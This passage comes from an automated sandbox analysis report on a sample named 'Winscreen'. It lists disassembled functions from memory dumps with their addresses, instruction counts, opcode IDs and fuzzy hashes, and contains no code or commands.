                                                                                        • Instruction ID: 10a4ef7f71c8d922769e8b4d30e7eb37784309f83ae2ce7e6a8e2e5e2cfdc728
                                                                                        • Opcode Fuzzy Hash: 65ac3591916b28c057b4e0274d6191d5c36be4085fa0cb9ac177ee8040c08858
                                                                                        • Instruction Fuzzy Hash: 35A10230A1DB4A8FE769BB38C49526977A2FF89344F5401BDC40ACB6D7DE29BC428744
                                                                                        Function 00007FF848F03F5A Relevance: .3, Instructions: 305COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d6aea9f0fafe7666284b1785b784afbb15dfbcb12390428987e6e53b8cf20fa
                                                                                        • Instruction ID: 4c3a5d37da5815e9175d5a5f279b2038f643d9afc2ceef1c36240e3613147272
                                                                                        • Opcode Fuzzy Hash: 5d6aea9f0fafe7666284b1785b784afbb15dfbcb12390428987e6e53b8cf20fa
                                                                                        • Instruction Fuzzy Hash: E3910472F1DA4A5FE398BA2C980517A73D2EFD5690F04053AD40EC73DAEE28EC468745
                                                                                        Function 00007FF848F03D1F Relevance: .3, Instructions: 302COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1368c6eab6c1d568ad5bc2a15612d98da5f04b5c7972b1b998b7f3fab33f3fff
                                                                                        • Instruction ID: ddf37683b0c60cfb08cf776c6e86493b803b8a1bebc05eec951e77d284c56ffd
                                                                                        • Opcode Fuzzy Hash: 1368c6eab6c1d568ad5bc2a15612d98da5f04b5c7972b1b998b7f3fab33f3fff
                                                                                        • Instruction Fuzzy Hash: 6A912972F1DA4A5FE398BA2C580517A73D2EFE4690F44053AD40EC73D6EE28EC468785
                                                                                        Function 00007FF848F030C5 Relevance: .3, Instructions: 292COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 06992622e04b6b6db1bfa7e60dc5e70d6b88f5fd5d8c9552a43c2ecc9a6db47c
                                                                                        • Instruction ID: 151af761fe0e4c2fa8db4e18c040b99be52375821435cfe049a572e7c239a3b6
                                                                                        • Opcode Fuzzy Hash: 06992622e04b6b6db1bfa7e60dc5e70d6b88f5fd5d8c9552a43c2ecc9a6db47c
                                                                                        • Instruction Fuzzy Hash: ED814972F1DD4A5FE7987A2C681517A23D2EFE9690B05007ED40EDB3DBED28AC464344
                                                                                        Function 00007FF848F05051 Relevance: .3, Instructions: 291COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a904c659f50a48f7fcb9fc54dbfe22d3fb9079d1782914f17c52cd903db968a3
                                                                                        • Instruction ID: 2ec3a03ff3f02e2eda2a6732025afc4192c244a3446a6c01a4402cd520dd2965
                                                                                        • Opcode Fuzzy Hash: a904c659f50a48f7fcb9fc54dbfe22d3fb9079d1782914f17c52cd903db968a3
                                                                                        • Instruction Fuzzy Hash: E1812772F1DE4A5FE398BA2C580517A23D2EFE5690F14013ED40EC73C6EE28AC468745
                                                                                        Function 00007FF848F056ED Relevance: .3, Instructions: 283COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bd7eb53c9d525fb4870be427bbbb072b2d5d2302aa50d589d3b777aaa0f18959
                                                                                        • Instruction ID: 4e18f0cba5252360c4266397d04cbf49858c19d8ea4b51731b90619e66f04aa0
                                                                                        • Opcode Fuzzy Hash: bd7eb53c9d525fb4870be427bbbb072b2d5d2302aa50d589d3b777aaa0f18959
                                                                                        • Instruction Fuzzy Hash: 15810572F1DA4A5FE3A8BA2C581517A23D2EFE5694F14003ED40EC73D7EE28AC468745
                                                                                        Function 00007FF848F058D2 Relevance: .3, Instructions: 281COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3739e08911a4c204dde3248565aa2b5efa2ae2309d8e2973c7e57172ca52b208
                                                                                        • Instruction ID: b08d8876e4af84b9d5905b36c006b35c3bee5ca037391b9971c8a8ca9f9b805a
                                                                                        • Opcode Fuzzy Hash: 3739e08911a4c204dde3248565aa2b5efa2ae2309d8e2973c7e57172ca52b208
                                                                                        • Instruction Fuzzy Hash: 2B812872F1DA4A5FE398BA2C580517A23D2EFE5690F44003AD40EC73DAEE28AC468745
                                                                                        Function 00007FF848F047E3 Relevance: .3, Instructions: 278COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e41f3847e26d517012e3b01dc04286748f555f59071ae22ee47c4ad1dfba77f4
                                                                                        • Instruction ID: 873a881ba537e11bf4a9c75492c31f0256ee730cefdc3e5ef4e7b7b51e683f78
                                                                                        • Opcode Fuzzy Hash: e41f3847e26d517012e3b01dc04286748f555f59071ae22ee47c4ad1dfba77f4
                                                                                        • Instruction Fuzzy Hash: B6812772F1DA4A5FE398BA2C580517A23D2EFE5690F55003AD40EC73DAEE38AC468745
                                                                                        Function 00007FF848FB0000 Relevance: .1, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2492048369.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848fb0000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8d5f960a67942c3425373cd2045371a94138366c5d3075a7d01739e3ec7e3a34
                                                                                        • Instruction ID: 77dce83b0d406debf5895c7e82e34c602bc962c5189f078c39e78f230211f57c
                                                                                        • Opcode Fuzzy Hash: 8d5f960a67942c3425373cd2045371a94138366c5d3075a7d01739e3ec7e3a34
                                                                                        • Instruction Fuzzy Hash: C9318D62A4EBD64FE357B3781C690703FA09FA7591B4E41FBC889CB1E3EA0918458356
                                                                                        Function 00007FF848FB05A5 Relevance: .1, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2492048369.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848fb0000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c2873898798a30cfdd53c949414433054c5c26c34b94c586e737269ebcb4f553
                                                                                        • Instruction ID: 8f564ee9678b3d184155fe42919050b2ca079c692d59a7acafa55b3061d55081
                                                                                        • Opcode Fuzzy Hash: c2873898798a30cfdd53c949414433054c5c26c34b94c586e737269ebcb4f553
                                                                                        • Instruction Fuzzy Hash: 7621D632A0EBCA1FD392E76C18552A17FE2DFA6550F0901F7D448D71E7ED088C0A8396
                                                                                        Function 00007FF848FB0805 Relevance: .1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2492048369.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848fb0000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a49b68915ff28190dfd8c667a4d9e21c69051c5357852abe6b01c290f5110615
                                                                                        • Instruction ID: 39f6e4241e29cf3f7b88c20c0fd19c33e1a3446db7102422ef5dbf969c9a78b0
                                                                                        • Opcode Fuzzy Hash: a49b68915ff28190dfd8c667a4d9e21c69051c5357852abe6b01c290f5110615
                                                                                        • Instruction Fuzzy Hash: E821CF32A0EAC54FE356F72818691B12BE1EFE6151B2D41F7D488C72E7C908DD058395
                                                                                        Function 00007FF848FB0091 Relevance: .1, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2492048369.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848fb0000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 54758311e1cd5f9e0674b051d20fb85c0065f7357ade48089d08267ce061ae9f
                                                                                        • Instruction ID: 7f1238be9dabb6ffaea4b7289728caa09327854cb3c03278b6e85660ecd79cb6
                                                                                        • Opcode Fuzzy Hash: 54758311e1cd5f9e0674b051d20fb85c0065f7357ade48089d08267ce061ae9f
                                                                                        • Instruction Fuzzy Hash: 0321DE6290EBC50FD347A3791CA91B03FA0DF67550B4E01FBC488CB1E3D9080C4A8352

                                                                                        Non-executed Functions

                                                                                        Function 00007FF848F1A819 Relevance: 1.7, Strings: 1, Instructions: 497COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,%q{
                                                                                        • API String ID: 0-81111954
                                                                                        • Opcode ID: 0145b3355b48f5485ceacb8803cf4810e05ce214ff7a0ac41253048e6e52d887
                                                                                        • Instruction ID: 40c94f4db333ff83624034e25bd526e856737bd15c3842eb96d5b9391db3a14f
                                                                                        • Opcode Fuzzy Hash: 0145b3355b48f5485ceacb8803cf4810e05ce214ff7a0ac41253048e6e52d887
                                                                                        • Instruction Fuzzy Hash: 94E16B31B2C7464FD719AB6CA8C50F173D1FF95364B58427ED08ACB293EA18AC478789
                                                                                        Function 00007FF848F16AB0 Relevance: .4, Instructions: 382COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: da70c6beeb06394e2d38b28a6d040557518c6de75b8be843565c1eb6404a7fdc
                                                                                        • Instruction ID: 9711ce880340c6901d500fb3e4e5a16b28f84383f397c7cec8362fd84069665d
                                                                                        • Opcode Fuzzy Hash: da70c6beeb06394e2d38b28a6d040557518c6de75b8be843565c1eb6404a7fdc
                                                                                        • Instruction Fuzzy Hash: A7B1793192CA490FE329FB6898855B17BD0EF453A4F5802BED48AC75C3EE19AC03C395
                                                                                        Function 00007FF848F00C38 Relevance: .4, Instructions: 357COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f77bc900786fc339ea098d2908fca799d528f986890073caab78b95428a2965c
                                                                                        • Instruction ID: c74e78924aebc58f43a19294058a39780dfd94ed97e697972a185d0243737dd6
                                                                                        • Opcode Fuzzy Hash: f77bc900786fc339ea098d2908fca799d528f986890073caab78b95428a2965c
                                                                                        • Instruction Fuzzy Hash: 0AA1483175C7060BD74CDE6D8DD6139B6D3EBD8640B44823DE94ACB3D5EE68EC068285
                                                                                        Function 00007FF848F16031 Relevance: .3, Instructions: 334COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f7254388e26db5f23a62b17fd18200de4b8fe71ee87295d0dc2980bc62ebd47
                                                                                        • Instruction ID: 32650f1748ec1ea65fd75c222efd5a0bc4536beb4e5dff39344f9ac4eae22cb4
                                                                                        • Opcode Fuzzy Hash: 8f7254388e26db5f23a62b17fd18200de4b8fe71ee87295d0dc2980bc62ebd47
                                                                                        • Instruction Fuzzy Hash: 6CA1473171C7060FD74C9E6D8CD6139B6D3EB99640B44427EE98ACB3D6ED28EC0A8385
                                                                                        Function 00007FF848F15A1D Relevance: .3, Instructions: 326COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 13e28d1af5c5cf1e1822a84e823efcd82d9649de88e2fd20903ad56ff255f2be
                                                                                        • Instruction ID: ca2376506576329b3669b3092843c2f54bbc67f3636b60ea7f023d3747050acc
                                                                                        • Opcode Fuzzy Hash: 13e28d1af5c5cf1e1822a84e823efcd82d9649de88e2fd20903ad56ff255f2be
                                                                                        • Instruction Fuzzy Hash: 42D15870E08249AFDB05DFA9C4955EDBBB1EF49300F44C1AAD069EB381DB38AA05CF55
                                                                                        Function 00007FF848F0058D Relevance: .3, Instructions: 306COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5c8a108ff802c29a5a0970be52c3028716bedf309880c76aab1f58be748fa034
                                                                                        • Instruction ID: 221826369743c8722e680c5d20c5e7b5517723bacb3b077b714830c991679575
                                                                                        • Opcode Fuzzy Hash: 5c8a108ff802c29a5a0970be52c3028716bedf309880c76aab1f58be748fa034
                                                                                        • Instruction Fuzzy Hash: 6A914632B0DA094FE768BB2D985417977D3EFD6260B1602BEE40DCB2D6EE25AC45C344
                                                                                        Function 00007FF848F005F0 Relevance: .3, Instructions: 274COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e9558ffa9c424c0f3fbabd6fe00b6fcee8f9693bd508cba2cfb0ff449e52116
                                                                                        • Instruction ID: 6803f8ce3de3aff04ad0e63017286e1869d09b1bafbadba3095b970d4e6b8259
                                                                                        • Opcode Fuzzy Hash: 2e9558ffa9c424c0f3fbabd6fe00b6fcee8f9693bd508cba2cfb0ff449e52116
                                                                                        • Instruction Fuzzy Hash: C8812336E2C54A4FEB5CAA5898511B97393EBD9360F25013ED44FCB2C6EE34AC128785
                                                                                        Function 00007FF848F0B3EA Relevance: .2, Instructions: 209COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e84c3981135ebe1062194c82711652e15b8ce107777fed3494ecd3a8d4409192
                                                                                        • Instruction ID: 00bd20db10f1c2a4e220b645829e4d05ab2010a24932a31088443326a8fcd611
                                                                                        • Opcode Fuzzy Hash: e84c3981135ebe1062194c82711652e15b8ce107777fed3494ecd3a8d4409192
                                                                                        • Instruction Fuzzy Hash: 67515536F2C90A4FEB68AA1888515B97293EFD9350F250139D40ECB2C5FF34AC128785
                                                                                        Function 00007FF848F0073D Relevance: .2, Instructions: 209COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 921cb04b1b66ef306afcddddcfb9b1cbd244be56ec516cdc9a947f5c1394e82f
                                                                                        • Instruction ID: 5b3c08e95d18f3eb6ce3e62dd3d63c7a04dfc6a4c7eebf597da04f19a12588f0
                                                                                        • Opcode Fuzzy Hash: 921cb04b1b66ef306afcddddcfb9b1cbd244be56ec516cdc9a947f5c1394e82f
                                                                                        • Instruction Fuzzy Hash: 9651F631B0CA0A4FD7A8FA2C9899579B3D3EBAD350744017AE00EC73D6DE24EC028744
                                                                                        Function 00007FF848F150F1 Relevance: .2, Instructions: 206COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 98601652808681981af0f2925e4be27a14bcbcd48eb6dcad9fc6a01a5340419d
                                                                                        • Instruction ID: 4528a63eb7a7afc27dc2c138c1257639e4e0092f1c8f763f56fb359a565c0016
                                                                                        • Opcode Fuzzy Hash: 98601652808681981af0f2925e4be27a14bcbcd48eb6dcad9fc6a01a5340419d
                                                                                        • Instruction Fuzzy Hash: FF51F83170DA494FD755FB7C88A9165BBE2EF6E350B4401FAD049CB2D3DA19AC06C345
                                                                                        Function 00007FF848F15155 Relevance: .2, Instructions: 170COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: df50ff87bb05dcf6cc7c75a2a0f7b7e571fb1b76e58a82140fa385ba2008543b
                                                                                        • Instruction ID: 64758076ff113f1fefa1b089ec8c80a001a110e3c06c9b2f470b65455d5fcc96
                                                                                        • Opcode Fuzzy Hash: df50ff87bb05dcf6cc7c75a2a0f7b7e571fb1b76e58a82140fa385ba2008543b
                                                                                        • Instruction Fuzzy Hash: CD41A331B1DA094FD7A8FB2C9899565B3D2EFAD35074401BAE00DC73D2DE25AC468744
                                                                                        Function 00007FF848F11AED Relevance: .2, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3346d7b8fc65d8a0f794e46c13b1d6d7f92234482c6c1cc054e2022fe4b77c4d
                                                                                        • Instruction ID: 7bd61d69d0e780209187a1ef7db61906a02e612c770b4ef3eb7ecd1e98c4afc6
                                                                                        • Opcode Fuzzy Hash: 3346d7b8fc65d8a0f794e46c13b1d6d7f92234482c6c1cc054e2022fe4b77c4d
                                                                                        • Instruction Fuzzy Hash: 13418B32B1CA0A0FDB5CEA7CA8D997876C1EB59340708117AE41BC73E3EE45DC418395
                                                                                        Function 00007FF848F09330 Relevance: .2, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 61d1ba65cfe40d784eb891dd70403c4a74008c0e83f5e8bd491de1e856a347db
                                                                                        • Instruction ID: 85c18920fd50d6755d8099b1a537b902fba11f0c7b6e3f6cfd1edb5c5a1da987
                                                                                        • Opcode Fuzzy Hash: 61d1ba65cfe40d784eb891dd70403c4a74008c0e83f5e8bd491de1e856a347db
                                                                                        • Instruction Fuzzy Hash: 9A4148337646060F931C9A3D9841076B2E7ABD525075A473EE49BCBBC4EE38D81B8B84
                                                                                        Function 00007FF848F0A6A0 Relevance: .2, Instructions: 151COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e2c469597868e7de3fd981f28702bc6cc035dee6f368ff84ae08a75feb20021e
                                                                                        • Instruction ID: 00181cd30a31376c4cedef69084e8032158a05c629bc2b2d1b472f3e833d6a21
                                                                                        • Opcode Fuzzy Hash: e2c469597868e7de3fd981f28702bc6cc035dee6f368ff84ae08a75feb20021e
                                                                                        • Instruction Fuzzy Hash: AA41BB3272CA0B0FDB4CEEBDA8D957866C2E788340704513AE50BCB3D6FE55DC428289
                                                                                        Function 00007FF848F0A960 Relevance: .1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 27149ff2cc5eae15af01f23f7d702a3dcad1f98306e8796df89ffeabf9518dfe
                                                                                        • Instruction ID: a8a3109efacf474eac918b05ab246ecc8da638e721745b1164f96fe468df2e6d
                                                                                        • Opcode Fuzzy Hash: 27149ff2cc5eae15af01f23f7d702a3dcad1f98306e8796df89ffeabf9518dfe
                                                                                        • Instruction Fuzzy Hash: 90418E3271CA1B0FE3ACFA7E58C517976CAEB98390B14517BE409C72A7F615EC864344
                                                                                        Function 00007FF848F00BE0 Relevance: .1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6956542c15ae02174512e6046a8423a92fb76c6bfe4d614a031e98ec859c0860
                                                                                        • Instruction ID: 8bdb0db724fdab80620ac2fb9d819517c3206c23428eaa3dfca226f049923010
                                                                                        • Opcode Fuzzy Hash: 6956542c15ae02174512e6046a8423a92fb76c6bfe4d614a031e98ec859c0860
                                                                                        • Instruction Fuzzy Hash: 1D41273570C70E4FEB6CBA6D68191797686DB99250F50433EE90ACB3C2FE14EC168384
                                                                                        Function 00007FF848F10EC9 Relevance: .1, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bef48bb72fc1588c607fb6547461608a7f955b6d53c0a05ae7d71c6e0ce82c6b
                                                                                        • Instruction ID: d0b834180a814b29a16422425bfc8bfd286b10494feffe0bfa9de254d029a71c
                                                                                        • Opcode Fuzzy Hash: bef48bb72fc1588c607fb6547461608a7f955b6d53c0a05ae7d71c6e0ce82c6b
                                                                                        • Instruction Fuzzy Hash: F631883271C6260FEBACFA6D94E15B967C2EF94350715017ED84BC77D2CE519C068385
                                                                                        Function 00007FF848F1B365 Relevance: .1, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cc15a92bc7b22688fcee618afb90c241fe7332789bbd811d7b339ea848807d9e
                                                                                        • Instruction ID: ebd22a489097d4cba298734dd6116aaf37ea1bf4e6bfb98aec6e92ff7e7d049b
                                                                                        • Opcode Fuzzy Hash: cc15a92bc7b22688fcee618afb90c241fe7332789bbd811d7b339ea848807d9e
                                                                                        • Instruction Fuzzy Hash: 59314A3566C2868FD30CDF6C98C1170B796FB85304B69A17DE0CBC76DBC628AC538249
                                                                                        Function 00007FF848F00BC8 Relevance: .1, Instructions: 124COMMON
